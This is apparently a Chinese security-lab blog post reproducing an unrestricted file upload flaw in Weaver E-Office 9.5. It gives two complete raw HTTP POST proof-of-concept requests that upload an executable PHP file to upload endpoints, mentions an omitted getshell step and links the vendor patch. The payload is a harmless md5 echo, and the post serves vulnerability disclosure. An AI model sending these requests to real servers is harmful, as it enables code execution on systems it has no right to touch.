网安引领时代,弥天点亮未来
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。
Weaver E-Office 9.5版本存在代码问题漏洞,该漏洞源于文件/webservice/upload/upload.php和/webservice/upload.php存在问题,对参数Filedata的操作会导致不受限制的上传。
Weaver E-Office 9.5版本
1.部署漏洞环境访问
2.对漏洞进行复现
Poc (POST)
路径1 /webservice/upload/upload.php
POST /webservice/upload/upload.php HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: USER_NAME_COOKIE=admin; LOGIN_LANG=cn
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------10267625012906
Content-Length: 208
-----------------------------10267625012906
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/php
echo md5(43856);unlink(__FILE__);
-----------------------------10267625012906--
漏洞复现
POST请求,响应存在漏洞
解析php文件
http://10.211.55.3:8082/attachment/870392248/pufh.php4
路径2 /webservice/upload.php
POST /webservice/upload.php HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 220
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl
Accept-Encoding: gzip
Connection: close
------WebKitFormBoundaryakbyiukl
Content-Disposition: form-data; name="file"; filename="pufh.php4"
Content-Type: application/octet-stream
echo md5(43856);unlink(__FILE__);
------WebKitFormBoundaryakbyiukl--
解析解php文件
http://10.211.55.3:8082/attachment/2085157518/pufh.php4
流量情况
3.afrog_2.6.0工具测试(漏洞存在)上传测试文件。
4.Getshell同泛微E-Office文件上传漏洞(CVE-2023-2648)操作,这里省略.......
泛微E-Office文件上传漏洞(CVE-2023-2648)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://service.e-office.cn/download
https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0125592
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):泛微E-Office文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论